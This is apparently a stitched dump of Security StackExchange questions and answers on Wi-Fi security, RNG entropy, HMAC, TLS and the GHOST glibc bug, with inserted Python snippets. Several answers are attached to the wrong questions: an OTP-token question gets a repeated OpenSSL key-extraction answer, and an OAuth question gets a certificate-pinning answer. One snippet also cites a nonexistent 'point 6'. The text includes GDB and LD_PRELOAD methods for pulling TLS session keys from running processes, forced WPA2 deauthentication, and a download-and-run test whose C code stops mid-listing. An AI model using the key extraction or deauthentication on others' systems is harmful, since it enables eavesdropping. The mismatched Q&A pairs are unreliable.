There's plenty of other ways, and you'll never prevent them all, but usually if your router is locked down , has a nice password, has WPS off, WPA2 on, a strong (new) router with a password, no remote-web access, unnecessary ports are closed, MAC filtering is used and intrusion detection in the router is switched on you will usually prevent even pretty dedicated attackers. They'll have to try harder methods and will probably just give up. | {
"source": [
"https://security.stackexchange.com/questions/79187",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47692/"
]
} |
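Point 6 of the answer above argues for long, non-human passphrases. A small sketch of generating one with a CSPRNG follows; note that WPA2-PSK passphrases are limited to 8-63 printable ASCII characters (a 64-character hex string is interpreted as the raw 256-bit PSK), and the alphabet chosen here is just one reasonable option.

```python
#!/usr/bin/env python3
"""Generate a long, non-human WPA2-PSK passphrase."""
import secrets
import string

ALPHABET = string.ascii_letters + string.digits + string.punctuation

def wpa2_passphrase(length: int = 63) -> str:
    if not 8 <= length <= 63:
        raise ValueError("WPA2-PSK passphrases must be 8-63 characters")
    # secrets uses the OS CSPRNG, so the result has no human-guessable structure.
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

if __name__ == "__main__":
    print(wpa2_passphrase())
```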
79,275 | Thomas Pornin has stated in the past on multiple occasions (I'm not going to source them, he can argue with me if he wants) that humans are bad RNGs. While I agree that human RNG for password generation in the mind is abysmal usually, I wanted to ask if human-aided RNG by a computer is equally as bad. KeePass has a feature where you seed the RNG by moving the mouse for a while, and while I know that if KeePass is using /dev/urandom it's more or less secure enough, I've used the mouse-seeded RNG in the past. I've always thought that RNG aided by human input would be better than just standard PRNG as provided by an operating system. How could someone predict exactly how I'd move my mouse, at what rate, how often I'm pausing, etc.? | Human brains are poor RNG. People are bad at generating random values in the privacy of their heads. They just cannot think randomly; though they can convince themselves that they do. Physical process, on the other hand, are rather good sources of entropy. Take your mouse movements. A few dozen times per second, the mouse measures how far it has moved since the last tick, and sends that information to the server. When your hand shakes, it tends to do so somewhat regularly, but biology is such that each elementary move will be subject to some jitter, which happens to be substantially bigger than the precision of the mouse; even with a lot of training, it is very hard for a human hand to do the exact same move repeatedly (otherwise there would be a lot more people like Yehudi Menuhin ). So the bottom line is that mouse movement measures contain some entropy. (Remember that "entropy" is here defined as "that which the attacker does not know"; the mouse certainly knows how much it has moved, since it is that mouse that actually sends the values on which the RNG are built.) The other half of the answer is aggregation . A mouse-based RNG will use hundreds or even thousands of measures, accumulate them all and condensate them into an appropriate seed that will concentrate all that entropy. This is simple enough: simply feed all the values to a cryptographic hash function, e.g. SHA-256, and you will get a 256-bit seed that has all the source entropy, wherever it was hiding in the measured mouse movements. Hash functions are good for that; they reduce the size but keep the entropy (up to the hash function output size, but 256 bits is more than enough for all purposes). An attacker may guess that the user will do circles, but will have a hard time getting all the individual movements right, especially since psychology won't help him: the human user himself has no idea how his hand movements are turned into numbers. Since we are talking about hundreds of numbers, the number of possible combinations (i.e. "entropy") raises exponentially. Contrast that with a human user thinking about a new password: the user will choose letters following some inner "witty" train of thought, that the attacker can guess more or less brutally (e.g. if the letters are all the first letters of some words in a sentence from a book, the attacker can automatically try all sentences from all books he can find in electronic format); and, more importantly, the human user won't be bothered to produce more than a dozen or so of "seemingly random" characters. In passwords, length does not make strength -- but lack of length can be quite effective at preventing strength. | {
"source": [
"https://security.stackexchange.com/questions/79275",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2374/"
]
} |
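The answer above describes the aggregation step: feed hundreds of mouse measurements into a cryptographic hash and use the digest as the seed. A toy sketch is below; the (dx, dy, dt) samples are simulated stand-ins for real pointer events, and a real implementation would mix in far more measurements plus other entropy sources.

```python
#!/usr/bin/env python3
"""Condense mouse-movement jitter into a 256-bit seed with SHA-256."""
import hashlib
import struct

def seed_from_movements(samples):
    h = hashlib.sha256()
    for dx, dy, dt_ms in samples:
        # Every measurement is fed into the hash; order and values both matter.
        h.update(struct.pack("<iiI", dx, dy, dt_ms))
    return h.digest()   # 32-byte seed, keeping up to 256 bits of the input entropy

if __name__ == "__main__":
    fake_samples = [(3, -1, 8), (2, 0, 9), (-4, 2, 7), (1, 1, 12)]   # stand-in data
    print(seed_from_movements(fake_samples).hex())
```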
79,316 | So I'm looking into public WiFi security in places such as hotels, coffee shops etc. It seems the current standard is just to use open wi fi connections in many of these locations. I would assume this is for a number of reasons: Simple for the company - the provider does not need to train their workers in basic network security, don't need to manage keys or anything really, just plug the router in and go. Also costs the company less because of this. Convenient for the user - the user doesn't have to concern themselves with trivial things like security, they just want to get straight to their online banking and shopping in a public place! Ignorance - the person adding the free WiFi simply has no idea of the security risks involved, or they are dumping the responsibility of security onto the user, it's their data/money/identity after all So, first question. In your experience, is it true that most coffee shops, hotels, airports typically use an open connection, or are protected networks more commonplace now? If it is the case that most are unprotected, are there any other reasons as to why this is the case, beyond the ones above that I've listed? Second question, assume a coffee shop with an open network, all traffic is extremely easy to sniff. Now picture the establishment upgrades it to WPA2/AES secured network. Is the network really that more secure? Sure attackers can no longer easily sniff the network from down the street, but how hard is it for them to go in, buy a coffee and get the current key. Even assuming the keys are changed daily, repeats are never used, and they are complex enough to take months to crack, any attacker could just buy a coffee and connect to the network right? Or even get the key through social engineering, or just get a friend to get a coffee and the key. I understand that WEP, WPA2 etc. all do encryption at a network (as opposed to user) level of granularity. I.e. if someone has the key, they can now decrypt all traffic on the network, so we're back to the problem that an attacker can read all traffic as if it was an open network, and it's already proven to be trivial to get the key. So, with this in mind, is an unlocked encrypted network equivalent to an open network? What sort of attacks could a hacker do on a WPA2 secured network? Could you do a man in the middle attack as easily as on an open network? Is it possible to create a rogue AP with the SSID and key, advertised with the same encryption standard, as possible with the open network? Thanks for reading this lengthy post, and thanks in advance for answers to any of my three questions! | Instead of continuing in the comments, I think I will just answer your real question, which I understand to be - why is using WPA/WPA2 Personal with a public SSID and Passphrase not more secure than having an open network, and why doesn't WPA/WPA2 Enterprise work in the coffee shop scenario. If the passphrase was public (as it would be in this scenario) and WPA/WPA2 personal is in use, anybody who has the passphrase and SSID name can decrypt anybody else's wireless traffic, as long as they can capture the initial 4-way handshake for that client (which occurs when connecting to the network). If someone wants to decrypt someone's future traffic but did not monitor their client's initial 4-way handshake, they can simply force a new handshake between that client and the AP using a targeted deauthentication, at which point you would be able to capture the new 4-way handshake and decrypt all of their future traffic. 
Of course, if the client under attack were to use a VPN, SSH tunnel, TLS, or some other strong encryption mechanism over the wireless, that traffic would be protected to the extent that the mechanism that they chose allows. The reason why their traffic can be decrypted is that WPA/WPA2 personal creates a pairwise master key from the passphrase and SSID used when logging in. The PMK is then used to create a Pairwise Transient Key and Groupwise Temporal key, where the PTK is unique per client and the GTK is shared for all currently connected clients (for broadcast traffic). This PTK can be derived from the PMK using information from the 4-way handshake (which is negotiated in plain text). Therefore, if you are able to sniff the 4-way handshake, you can get the information used to derive that client's PTK from the PMK that you already know because you know the passphrase and SSID (usually by doing PBKDF2(Passphrase, SSID, ssidlen, 4096, 256)). WPA enterprise doesn't work well because everyone would need a way to authenticate, whether credentials (EAP-PEAP), certificate (EAP-TLS), or other (various other EAP modes), and this wouldn't support the coffee shop's goal of providing free wireless access to nearby individuals. | {
"source": [
"https://security.stackexchange.com/questions/79316",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/66421/"
]
} |
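The answer above notes that the pairwise master key comes from the passphrase and SSID, "usually by doing PBKDF2(Passphrase, SSID, ssidlen, 4096, 256)". A sketch of exactly that derivation follows (the passphrase and SSID are made-up values); it shows why everyone who knows a coffee shop's shared passphrase starts from the same PMK and only needs a client's 4-way handshake to derive that client's PTK.

```python
#!/usr/bin/env python3
"""Derive a WPA/WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32 bytes)."""
import hashlib

def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, dklen=32)

if __name__ == "__main__":
    pmk = wpa2_pmk("coffeeshop-password", "CoffeeShopWiFi")   # illustrative values
    print(pmk.hex())
```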
79,544 | I have an https website that is protected by a login form (username + password). Does it add anything, protection wise, if I put this website behind a firewall that only allow certain IP address? | Yes, locking your service down by IP will prevent your service being found by the general internet population and will dramatically reduce the attack surface if managed correctly. This will make your site safer from not just brute force attacks - your whole application will be "invisible". Despite this fact, locking down IPs should not be done in lieu of other measures such as ensuring your web application and server is secure from other vulnerabilities - if one of your "good IPs" is compromised, an attacker could use this as a pivot in order to attack your site. Also be aware that any malware running by any of your trusted users could be used by an attacker to bypass the IP restriction. So use it as an extra layer of security, but do not let this trick you into a false sense of security where you let your guard down. Treat your web application and platform as if it was fully internet visible - regularly scan and test it for vulnerabilities, and make sure that the management of allowed IP addresses is done properly by deleting and updating and verifying on a regular basis. | {
"source": [
"https://security.stackexchange.com/questions/79544",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/50051/"
]
} |
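The answer above recommends enforcing the restriction at the firewall. The same allowlist idea can also be sketched as a defence-in-depth check inside the application, as below; the networks listed are placeholders, and this complements rather than replaces the firewall rule.

```python
#!/usr/bin/env python3
"""Minimal source-IP allowlist check, e.g. run before showing the login form."""
import ipaddress

ALLOWED_NETWORKS = [
    ipaddress.ip_network("203.0.113.0/24"),    # e.g. office network (placeholder)
    ipaddress.ip_network("198.51.100.7/32"),   # e.g. an admin's home IP (placeholder)
]

def is_allowed(remote_ip: str) -> bool:
    addr = ipaddress.ip_address(remote_ip)
    return any(addr in net for net in ALLOWED_NETWORKS)

if __name__ == "__main__":
    for ip in ("203.0.113.42", "192.0.2.9"):
        print(ip, "allowed" if is_allowed(ip) else "denied")
```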
79,577 | Is there anything different about how secure these two hashing algorithms are? Does HMAC "fuse" the data and the key in a special way that's more security-aware? | Yes, HMAC is more complex than simple concatenation. As a simplistic example, if you were to simply concatenate key + data, then "key1"+"data" yields identical results to "key"+"1data", which is suboptimal. HMAC will yield different results for each. There are other flaws with simple concatenation in many cases, as well; see cpast's answer for one. The specification for HMAC is called RFC2104 , which you should read if you have this level of interest. In summary, to implement HMAC, you should first: Create "ipad", which is 0x36 repeated BLOCKSIZE times.
Create "opad", which is 0x5c repeated BLOCKSIZE times. Note that BLOCKSIZE is 64 bytes for MD5, SHA-1, SHA-224, SHA-256, and 128 bytes for SHA-384 and SHA-512, per RFC2104 and RFC4868 . Then HMAC is defined as: HASH(Key XOR opad, HASH(Key XOR ipad, text)) or, in detail from the RFC, (Pretext: The definition of HMAC requires a cryptographic hash function, which
we denote by H, and a secret key K. We assume H to be a cryptographic
hash function where data is hashed by iterating a basic compression
function on blocks of data. We denote by B the byte-length of such
blocks.) (1) append zeros to the end of K to create a B byte string
(e.g., if K is of length 20 bytes and B=64, then K will be
appended with 44 zero bytes 0x00)
(2) XOR (bitwise exclusive-OR) the B byte string computed in step
(1) with ipad
(3) append the stream of data 'text' to the B byte string resulting
from step (2)
(4) apply H to the stream generated in step (3)
(5) XOR (bitwise exclusive-OR) the B byte string computed in
step (1) with opad
(6) append the H result from step (4) to the B byte string
resulting from step (5)
(7) apply H to the stream generated in step (6) and output
the result | {
"source": [
"https://security.stackexchange.com/questions/79577",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/66642/"
]
} |
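A small sketch tying the RFC 2104 steps above to running code: it builds HMAC-SHA256 by hand, checks the result against Python's hmac module, and shows the "key1"+"data" versus "key"+"1data" ambiguity that plain concatenation cannot distinguish. The 64-byte block size matches SHA-256, as noted in the answer.

```python
#!/usr/bin/env python3
"""HMAC-SHA256 per RFC 2104, compared against the hmac module."""
import hashlib
import hmac

BLOCKSIZE = 64   # block size in bytes for SHA-256

def hmac_sha256(key: bytes, msg: bytes) -> bytes:
    if len(key) > BLOCKSIZE:                  # overlong keys are hashed first
        key = hashlib.sha256(key).digest()
    key = key.ljust(BLOCKSIZE, b"\x00")       # step (1): pad the key to the block size
    ipad = bytes(b ^ 0x36 for b in key)       # step (2): K XOR ipad
    opad = bytes(b ^ 0x5C for b in key)       # step (5): K XOR opad
    inner = hashlib.sha256(ipad + msg).digest()    # steps (3)-(4)
    return hashlib.sha256(opad + inner).digest()   # steps (6)-(7)

if __name__ == "__main__":
    key, msg = b"key1", b"data"
    assert hmac_sha256(key, msg) == hmac.new(key, msg, hashlib.sha256).digest()

    # Naive concatenation cannot tell these two apart; HMAC can.
    naive_a = hashlib.sha256(b"key1" + b"data").hexdigest()
    naive_b = hashlib.sha256(b"key" + b"1data").hexdigest()
    print("naive hashes equal:", naive_a == naive_b)                        # True
    print("HMAC digests equal:",
          hmac_sha256(b"key1", b"data") == hmac_sha256(b"key", b"1data"))   # False
```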
79,642 | I am about to move in a new house, and I would like to install some security cameras. The contractor told me that in order for me to check the videos recorded by the cameras in real time when I am away I'll need to have a static IP address. Are there problems with it? Is it less secure? I am not a billionaire or famous so it is unlikely there will be targeted attacks. On the other hand it would be my home network and it'll happen that I'll input my bank credentials sooner or later, so I want it to be safe. | Static or dynamic IP is a non-issue. But since you brought up cameras, you should know that many IP cameras have VERY poor security. Many of these cameras have a known bad firmware in them that allows unauthenticated download of the entire memory of the device via simply going to /proc/kcore, without the need to authenticate. This allows anyone to obtain the password for your camera. http://www.tripwire.com/state-of-security/vulnerability-management/vulnerability-who-is-watching-your-ip-camera/ | {
"source": [
"https://security.stackexchange.com/questions/79642",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25305/"
]
} |
79,833 | As part of an increase in the security measures for our company, we're moving to making sure all password logins (databases, servers, etc), are done through a password prompt and never using stored passwords. The hope here is that if a company laptop were to go missing, we wouldn't need to change all our passwords. Is this really enough to assume we wouldn't need to change passwords? Is it not possible to recover passwords from memory or disk when they are typed in interactively? | This is a fallacy on several levels. First, you can't expect people to remember passwords that are both strong and unique to each service. It's just not gonna happen. Implementing this is just begging to have "passwords.xlsx" pinned to half the users desktops (the other half will use "passwords.docx"). Second, trying to prevent password change is a move in the completely wrong direction. Instead, you should invest in a strategy that makes it painless to change passwords as often as needed or wanted and help users (including admins) manage these passwords in a safe and efficient way. The reason for that last statement is that if there is one thing certain with passwords, it's that at one point, you will have to change them. An administrator moves on? Change all your system passwords. A manager used the same password for the corporate network as well as his son's football team forum? Change his password. Found a post-it the payroll admin stuck to his screen? Change his password. Use single-sign-on whenever you can, provide a convenient password manager for your users, educate them as much as possible and make it trivially easy to change their passwords. That's the only way to make password usage in an enterprise less risky. | {
"source": [
"https://security.stackexchange.com/questions/79833",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/66844/"
]
} |
80,158 | Consider an application using OpenSSL which has a bug. A packet capture of the full SSL session is available, as well as a core dump and debugging symbols for the application and libraries. A RSA private key is also available, but since a DHE cipher suite is in use, this cannot be used to decrypt the packet capture using Wireshark. Thomas suggests in this post that it is possible to extract keys from RAM. How could this be done for OpenSSL? Assume that the address of the SSL data structure is known and TLS 1.0 is in use. | Note: as of OpenSSL 1.1.1 (unreleased), it will be possible to set a callback function that receives the key log lines. See the SSL_CTX_set_keylog_callback(3) manual for details. This can be injected as usual using a debugger or a LD_PRELOAD hook. Read on if you are stuck with an older OpenSSL version. For a walkthrough of the LD_PRELOAD approach for Apache on Debian Stretch, see my post to Extracting openssl pre-master secret from apache2 . Technical details follow below. If you have just gdb access to the live process or a core dump, you could read data from data structures. It is also possible to use an interposing library. In the following text, the basic idea of key extraction using GDB is described, then an automated script is given to perform the capture. Using GDB (basic idea) Based on this Stackoverflow post , I was able to construct a function that could print a line suitable for Wireshark's key logfile. This is especially useful while analyzing core dumps. In GDB, execute: python
def read_as_hex(name, size):
    addr = gdb.parse_and_eval(name).address
    data = gdb.selected_inferior().read_memory(addr, size)
    return ''.join('%02X' % ord(x) for x in data)
def pm(ssl='s'):
    mk = read_as_hex('%s->session->master_key' % ssl, 48)
    cr = read_as_hex('%s->s3->client_random' % ssl, 32)
    print('CLIENT_RANDOM %s %s' % (cr, mk))
end Then later on, after you step upwards in the stack until you get a SSL structure, invoke the python pm() command. Example: (gdb) bt
#0 0x00007fba7d3623bd in read () at ../sysdeps/unix/syscall-template.S:81
#1 0x00007fba7b40572b in read (__nbytes=5, __buf=0x7fba5006cbc3, __fd=<optimized out>) at /usr/include/x86_64-linux-gnu/bits/unistd.h:44
#2 sock_read (b=0x7fba60191600, out=0x7fba5006cbc3 "\027\003\001\001\220T", outl=5) at bss_sock.c:142
#3 0x00007fba7b40374b in BIO_read (b=0x7fba60191600, out=0x7fba5006cbc3, outl=5) at bio_lib.c:212
#4 0x00007fba7b721a34 in ssl3_read_n (s=0x7fba60010a60, n=5, max=5, extend=<optimized out>) at s3_pkt.c:240
#5 0x00007fba7b722bf5 in ssl3_get_record (s=0x7fba60010a60) at s3_pkt.c:507
#6 ssl3_read_bytes (s=0x7fba60010a60, type=23, buf=0x7fba5c024e00 "Z", len=16384, peek=0) at s3_pkt.c:1011
#7 0x00007fba7b720054 in ssl3_read_internal (s=0x7fba60010a60, buf=0x7fba5c024e00, len=16384, peek=0) at s3_lib.c:4247
...
(gdb) frame
#4 0x00007fba7b721a34 in ssl3_read_n (s=0x7fba60010a60, n=5, max=5, extend=<optimized out>) at s3_pkt.c:240
240 in s3_pkt.c
(gdb) python pm()
CLIENT_RANDOM 9E7EFAC51DBFFF84FCB9...81796EBEA5B15E75FF71EBE 6ED2EA80181... Note : do not forget to install OpenSSL with debugging symbols ! On Debian derivatives it would be named something like libssl1.0.0-dbg , Fedora/RHEL call it openssl-debuginfo , etc. Using GDB (improved, automated approach) The basic idea which is described above works for small, manual tests. For bulk extraction of keys (from a SSL server for example), it would be nicer to automate extraction of these keys. This is done by this Python script for GDB: https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/sslkeylog.py (see its headers for installation and usage instructions). It basically works like this: Install breakpoints on several functions where new pre-master keys can arise. Wait for the function to finish and write these keys (if not known before) to a file (which follows the SSLKEYLOGFILE format from NSS). Paired with Wireshark, you perform a live capture from a remote server by running these commands: # Start logging SSL keys to file premaster.txt. Be careful *not* to
# press Ctrl-C in gdb, these are passed to the application. Use
# kill -TERM $PID_OF_GDB (or -9 instead of -TERM if that did not work).
(server) SSLKEYLOGFILE=premaster.txt gdb -batch -ex skl-batch -p `pidof nginx`
# Read SSL keys from the remote server, flushing after each written line
(local) ssh user@host stdbuf -oL tailf premaster.txt > premaster.txt
# Capture from the remote side and immediately pass the pcap to Wireshark
(local) ssh user@host 'tcpdump -w - -U "tcp port 443"' |
wireshark -k -i - -o ssl.keylog_file:premaster.txt Using LD_PRELOAD SSL/TLS can only negotiate keys at the SSL handshake steps. By interposing the library interfaces of OpenSSL ( libssl.so ) that performs said actions you will be able to read the pre-master key. For clients, you need to interpose SSL_connect . For servers you need to interpose SSL_do_handshake or SSL_accept (depending on the application). To support renegotiation, you will also have to intercept SSL_read and SSL_write . Once these functions are intercepted using a LD_PRELOAD library, you can use dlsym(RTLD_NEXT, "SSL_...") to lookup the "real" symbol from the SSL library. Call this function, extract the keys and pass the return value. An implementation of this functionality is available at https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/sslkeylog.c . Note that different OpenSSL versions (1.0.2, 1.1.0, 1.1.1) are all incompatible with each other. If you have multiple OpenSSL versions installed and need to build an older version, you might have to override the header and library paths: make -B CFLAGS='-I/usr/include/openssl-1.0 -DOPENSSL_SONAME=\"libssl.so.1.0.0\"' | {
"source": [
"https://security.stackexchange.com/questions/80158",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2630/"
]
} |
80,168 | I found a one-time-password token and am unable to find out who it belongs to or where it has been used. It seems to be manufactured by a company called "ActivIdentity" (now "HID") and called the "keychain"-model. This is what it looks like: It requested a PIN (which I obviously not know), and after I tried several random numbers it locked completely. Looking at the online manual for users of the token, the token must be given to the user's company's IT-administrator to be reinitialized, which I of course don't have. As far as I could find out, one possibility for the administrator would be to initialize it with the "ActivIdentity AAA-Server", which I also don't have. Now I hope to be able to use it for my own systems (e.g. authentication for my ssh-access on my own server). In order to do this, I need to initialize it. Is there any known way to initialize the key with software available to private users? Is there any know possibility to use this for already available online services? | Note: as of OpenSSL 1.1.1 (unreleased), it will be possible to set a callback function that receives the key log lines. See the SSL_CTX_set_keylog_callback(3) manual for details. This can be injected as usual using a debugger or a LD_PRELOAD hook. Read on if you are stuck with an older OpenSSL version. For a walkthrough of the LD_PRELOAD approach for Apache on Debian Stretch, see my post to Extracting openssl pre-master secret from apache2 . Technical details follow below. If you have just gdb access to the live process or a core dump, you could read data from data structures. It is also possible to use an interposing library. In the following text, the basic idea of key extraction using GDB is described, then an automated script is given to perform the capture. Using GDB (basic idea) Based on this Stackoverflow post , I was able to construct a function that could print a line suitable for Wireshark's key logfile. This is especially useful while analyzing core dumps. In GDB, execute: python
def read_as_hex(name, size):
addr = gdb.parse_and_eval(name).address
data = gdb.selected_inferior().read_memory(addr, size)
return ''.join('%02X' % ord(x) for x in data)
def pm(ssl='s'):
mk = read_as_hex('%s->session->master_key' % ssl, 48)
cr = read_as_hex('%s->s3->client_random' % ssl, 32)
print('CLIENT_RANDOM %s %s' % (cr, mk))
end Then later on, after you step upwards in the stack until you get a SSL structure, invoke the python pm() command. Example: (gdb) bt
#0 0x00007fba7d3623bd in read () at ../sysdeps/unix/syscall-template.S:81
#1 0x00007fba7b40572b in read (__nbytes=5, __buf=0x7fba5006cbc3, __fd=<optimized out>) at /usr/include/x86_64-linux-gnu/bits/unistd.h:44
#2 sock_read (b=0x7fba60191600, out=0x7fba5006cbc3 "\027\003\001\001\220T", outl=5) at bss_sock.c:142
#3 0x00007fba7b40374b in BIO_read (b=0x7fba60191600, out=0x7fba5006cbc3, outl=5) at bio_lib.c:212
#4 0x00007fba7b721a34 in ssl3_read_n (s=0x7fba60010a60, n=5, max=5, extend=<optimized out>) at s3_pkt.c:240
#5 0x00007fba7b722bf5 in ssl3_get_record (s=0x7fba60010a60) at s3_pkt.c:507
#6 ssl3_read_bytes (s=0x7fba60010a60, type=23, buf=0x7fba5c024e00 "Z", len=16384, peek=0) at s3_pkt.c:1011
#7 0x00007fba7b720054 in ssl3_read_internal (s=0x7fba60010a60, buf=0x7fba5c024e00, len=16384, peek=0) at s3_lib.c:4247
...
(gdb) frame
#4 0x00007fba7b721a34 in ssl3_read_n (s=0x7fba60010a60, n=5, max=5, extend=<optimized out>) at s3_pkt.c:240
240 in s3_pkt.c
(gdb) python pm()
CLIENT_RANDOM 9E7EFAC51DBFFF84FCB9...81796EBEA5B15E75FF71EBE 6ED2EA80181... Note : do not forget to install OpenSSL with debugging symbols ! On Debian derivatives it would be named something like libssl1.0.0-dbg , Fedora/RHEL call it openssl-debuginfo , etc. Using GDB (improved, automated approach) The basic idea which is described above works for small, manual tests. For bulk extraction of keys (from a SSL server for example), it would be nicer to automate extraction of these keys. This is done by this Python script for GDB: https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/sslkeylog.py (see its headers for installation and usage instructions). It basically works like this: Install breakpoints on several functions where new pre-master keys can arise. Wait for the function to finish and write these keys (if not known before) to a file (which follows the SSLKEYLOGFILE format from NSS). Paired with Wireshark, you perform a live capture from a remote server by running these commands: # Start logging SSL keys to file premaster.txt. Be careful *not* to
# press Ctrl-C in gdb, these are passed to the application. Use
# kill -TERM $PID_OF_GDB (or -9 instead of -TERM if that did not work).
(server) SSLKEYLOGFILE=premaster.txt gdb -batch -ex skl-batch -p `pidof nginx`
# Read SSL keys from the remote server, flushing after each written line
(local) ssh user@host stdbuf -oL tailf premaster.txt > premaster.txt
# Capture from the remote side and immediately pass the pcap to Wireshark
(local) ssh user@host 'tcpdump -w - -U "tcp port 443"' |
wireshark -k -i - -o ssl.keylog_file:premaster.txt Using LD_PRELOAD SSL/TLS can only negotiate keys at the SSL handshake steps. By interposing the library interfaces of OpenSSL ( libssl.so ) that performs said actions you will be able to read the pre-master key. For clients, you need to interpose SSL_connect . For servers you need to interpose SSL_do_handshake or SSL_accept (depending on the application). To support renegotiation, you will also have to intercept SSL_read and SSL_write . Once these functions are intercepted using a LD_PRELOAD library, you can use dlsym(RTLD_NEXT, "SSL_...") to lookup the "real" symbol from the SSL library. Call this function, extract the keys and pass the return value. An implementation of this functionality is available at https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/sslkeylog.c . Note that different OpenSSL versions (1.0.2, 1.1.0, 1.1.1) are all incompatible with each other. If you have multiple OpenSSL versions installed and need to build an older version, you might have to override the header and library paths: make -B CFLAGS='-I/usr/include/openssl-1.0 -DOPENSSL_SONAME=\"libssl.so.1.0.0\"' | {
"source": [
"https://security.stackexchange.com/questions/80168",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67122/"
]
} |
80,170 | I have a TLS connection between my server and client. I have no certificate, so the connection is susceptible to a man-in-the-middle attack. I fear that an attacker could intercept the password hash and use it to authenticate himself in my application. What is the best way to transmit the password hash? Should I use a server nonce or a client nonce? And what hashing algorithm should I use? | You should look into certificate pinning. This effectively allows your client to trust your self-signed certificate, and that server certificate only, by a hard lookup of the certificate's public key. The chain of authority is not followed (which is where a self-signed certificate falls down); instead the public key is validated by the client application to be trusted directly. You should not look at hashing, or anything else on the application layer, as it will be inherently susceptible to a MITM attack. | {
"source": [
"https://security.stackexchange.com/questions/80170",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67126/"
]
} |
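A rough sketch of the pinning check described above, using only the Python standard library; the host, port and pinned fingerprint are placeholders. It pins the SHA-256 fingerprint of the whole server certificate; pinning the public key (SPKI) instead is a common refinement, since the pin then survives certificate renewals that keep the same key pair. Chain validation is deliberately skipped because the hard-coded pin is the trust anchor.

```python
#!/usr/bin/env python3
"""Certificate-pinning sketch for a self-signed server certificate."""
import hashlib
import socket
import ssl

HOST, PORT = "myserver.example", 443   # placeholder endpoint
PINNED_SHA256 = "00" * 32              # placeholder: your certificate's SHA-256 fingerprint

def server_cert_fingerprint(host: str, port: int) -> str:
    # No CA-chain validation here: trust comes from the pin comparison below.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            der = tls.getpeercert(binary_form=True)   # the certificate, DER-encoded
    return hashlib.sha256(der).hexdigest()

if __name__ == "__main__":
    seen = server_cert_fingerprint(HOST, PORT)
    if seen != PINNED_SHA256:
        raise SystemExit(f"Pin mismatch - possible MITM. Got {seen}")
    print("Certificate pin verified; proceed with the protected request.")
```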
80,190 | This question is somewhat acedemic in nature. While educating myself about the topic of Security via a Bearer Tokens for a back-end service that I am working on, and specifically about oAuth2, a few questions came up in my mind: If you were to outsource the identity provider / authorization service, you create a dependency on that service provider. How much of a pain would it be to move to a new oAuth2 service provider? What if the service provider "fails" (disappears from the internet or have their systems compromised or changes their policies in a way that is incompatible with your requirements, etc) As a way of reducing dependency it occurred to me that I might be able to configure the resource server to check every request to have two tokens, from two different service providers, eg SP-A and SP-B. To do that your [client's] users would have to "be registered" at both SP-A and SP-B. That would imply that during the sign-up process, users details would be submitted to and records created at both SP-A and SP-B. Client developers will be impacted in that they need to develop their applications to register users with two oAuth providers, and must obtain Authorization codes from two providers. For end users the impact may be minimized, but if a client wanted to use users' existing OpenID IdPs to effect initial registration and sign-in authentication, the user would have to authorize TWO access to their data. The one immediate benefit would be that you could then set a global flag in the back-end for each of SP-A and SP-B, to ignore/bypass that provider, should you need. You could also use different policies, eg require a valid token from all oAuth providers, or from at least one oAuth provider, etc, depending on your requirements. Of course one would always still have to check an Authorization Providers' credentials, track record, etc and try to evaluate the risks. | You should look into Certificate pinning . This is effectively allowing you to trust your self-signed certificate, and that server certificate only from your client by a hard lookup of the public key of the certificate. So the chain of authority is not followed (which is where a self-signed certificate falls down) and instead the public key is validated by the client application to be trusted directly. You should not look at hashing, or anything else on the application layer as it will be inherently susceptible to a MITM attack. | {
"source": [
"https://security.stackexchange.com/questions/80190",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/66581/"
]
} |
80,210 | GHOST ( CVE-2015-0235 ) just popped up. How can I quickly check if a system of mine is secure? Ideally with a one line shell command. According to the ZDNet article "you should then reboot the system". Ideally the test would also indicate this... | It appears you can download a tool from the University of Chicago that will let you test your system for the vulnerability. This does not repair or restart anything it will only tell you if your system is vulnerable. $ wget https://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c
$ gcc GHOST.c -o GHOST
$ ./GHOST
[responds vulnerable OR not vulnerable ] Running this on one of my remote servers I get: user@host:~# wget https://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c
--2015-01-27 22:30:46-- https://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c
Resolving webshare.uchicago.edu (webshare.uchicago.edu)... 128.135.22.61
Connecting to webshare.uchicago.edu (webshare.uchicago.edu)|128.135.22.61|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1046 (1.0K) [text/x-csrc]
Saving to: `GHOST.c'
100%[============================================>] 1,046 --.-K/s in 0s
2015-01-27 22:30:48 (237 MB/s) - `GHOST.c' saved [1046/1046]
user@host:~# gcc GHOST.c -o GHOST
user@host:~# ./GHOST
vulnerable The source code of that script looks like this next code block but you should inspect the origin code first anyway . As others have pointed out, if you are arbitrarily running code off the internet without knowing what it does then bad things may happen : /*
* GHOST vulnerability check
* http://www.openwall.com/lists/oss-security/2015/01/27/9
* Usage: gcc GHOST.c -o GHOST && ./GHOST
*/
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];
char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };
int main(void) {
struct hostent resbuf;
struct hostent *result;
int herrno;
int retval;
/*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
